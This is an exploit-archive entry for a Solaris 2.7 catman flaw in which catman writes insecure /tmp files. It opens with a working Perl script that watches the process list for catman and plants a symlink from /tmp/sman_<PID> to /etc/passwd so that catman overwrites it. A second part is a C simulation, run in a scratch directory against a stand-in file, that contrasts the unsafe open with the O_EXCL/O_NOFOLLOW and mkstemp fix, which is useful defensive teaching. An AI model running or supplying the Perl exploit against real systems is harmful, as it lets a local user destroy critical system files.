SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit

2000-12-20T00:00:00
ID 1337DAY-ID-5807
Type zdt
Reporter lwc
Modified 2000-12-20T00:00:00

Description

Exploit for solaris platform in category dos / poc

=============================================================
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
=============================================================


#!/usr/local/bin/perl -w 
#
# The problem is that catman creates files in /tmp
# insecurely. The names are based on the PID of the
# catman process, and catman will happily clobber
# whatever file that /tmp name is symlinked to.
# The idea of this script is to watch the process
# list for the catman process, get the PID and
# create a symlink in /tmp from that name to the
# file we want clobbered. This exploit depends on
# system speed and process load. This worked on a
# patched Solaris 2.7 box (August 2000 patch
# cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 [email protected]
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

use strict;

# File that catman will clobber through our symlink.
my $clobber = "/etc/passwd";

# Poll the process list until a catman process shows up.
while (1) {
    open(my $ps, '-|', 'ps -ef | grep -v grep | grep -v PID')
        or die "cannot run ps: $!\n";
    while (<$ps>) {
        my @args = split ' ', $_;   # ps -ef columns: UID PID PPID ... CMD
        if (/catman/) {
            # catman writes /tmp/sman_<PID>; point that name at the target.
            print "Symlinking sman_$args[1] to $clobber\n";
            symlink($clobber, "/tmp/sman_$args[1]")
                or warn "symlink failed: $!\n";
            exit(1);
        }
    }
    close($ps);
}
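The bug class the script above abuses, shown from the victim program's side. This is an added example, not catman's source and not Vapid Labs' code: it plays both roles of the race in a private scratch directory (under TMPDIR, or /tmp if unset), with a "victim" file standing in for /etc/passwd and an arbitrary PID of 1234 for the sman_<pid> name. The careless writer opens the predictable name with O_CREAT|O_TRUNC and follows the planted symlink; the hardened writer adds O_EXCL|O_NOFOLLOW and is refused.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of one simulated race (added example; not catman's code). */
struct race_result {
    int unsafe_rc;         /* 0: the careless open/write went through the symlink */
    int victim_clobbered;  /* 1: the victim file's contents were replaced */
    int safe_rc;           /* -1: the hardened open refused the planted symlink */
    int safe_errno;        /* errno from that refusal: EEXIST (Linux) or ELOOP */
};

/* open()+write() with the given flags; returns 0 on a complete write. */
static int write_with(const char *path, int flags, mode_t mode, const char *data)
{
    int fd = open(path, flags, mode);
    if (fd < 0)
        return -1;                      /* errno left set by open() */
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Careless pattern: predictable name, O_CREAT|O_TRUNC, symlinks followed.
 * This is the behaviour the Perl script above relies on. */
static int write_unsafe(const char *path, const char *data)
{
    return write_with(path, O_WRONLY | O_CREAT | O_TRUNC, 0644, data);
}

/* Hardened pattern: O_EXCL fails if the name already exists (even as a
 * symlink) and O_NOFOLLOW refuses a symlink at the final component.
 * mkstemp() gives the same guarantees plus an unpredictable name. */
static int write_safe(const char *path, const char *data)
{
    return write_with(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600, data);
}

/* Reads at most cap-1 bytes of path into buf, NUL-terminated. */
static ssize_t read_small(const char *path, char *buf, size_t cap)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Plays both sides of the race in a private scratch directory:
 *   1. a "victim" file stands in for /etc/passwd;
 *   2. the attacker plants sman_<pid> as a symlink to it (the script's move);
 *   3. the careless writer opens sman_<pid> and clobbers the victim;
 *   4. the hardened writer opens the same name and is refused.
 * The pid 1234 is arbitrary. Returns 0 when the scenario ran, -1 on setup error. */
int simulate_symlink_race(struct race_result *r)
{
    const char *tmp = getenv("TMPDIR");
    char dir[PATH_MAX], victim[PATH_MAX], link[PATH_MAX], buf[64];
    int rc = -1;

    snprintf(dir, sizeof dir, "%s/tmprace.XXXXXX", (tmp && *tmp) ? tmp : "/tmp");
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/sman_%d", dir, 1234);

    memset(r, 0, sizeof *r);
    if (write_safe(victim, "root:x:0:0::/:/bin/sh\n") == 0 &&   /* constructed victim */
        symlink(victim, link) == 0) {
        r->unsafe_rc = write_unsafe(link, "formatted man page\n");
        if (read_small(victim, buf, sizeof buf) >= 0)
            r->victim_clobbered = strcmp(buf, "formatted man page\n") == 0;

        errno = 0;
        r->safe_rc = write_safe(link, "formatted man page\n");
        r->safe_errno = errno;
        rc = 0;
    }
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void)
{
    struct race_result r;
    if (simulate_symlink_race(&r) != 0)
        return 1;
    printf("careless writer: rc=%d, victim clobbered=%d\n", r.unsafe_rc, r.victim_clobbered);
    printf("hardened writer: rc=%d, errno=%s\n", r.safe_rc, strerror(r.safe_errno));
    return 0;
}
```

The hardened open is what a fixed catman would need: O_EXCL alone already defeats a pre-planted symlink, because POSIX requires O_CREAT|O_EXCL to fail when the path exists as a symlink regardless of its target; O_NOFOLLOW closes the same hole for opens that are not creating. Neither flag helps if the name is still predictable and the directory is world-writable, which is why mkstemp() or a per-user directory is the usual fix.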

#  0day.today [2018-01-01]  #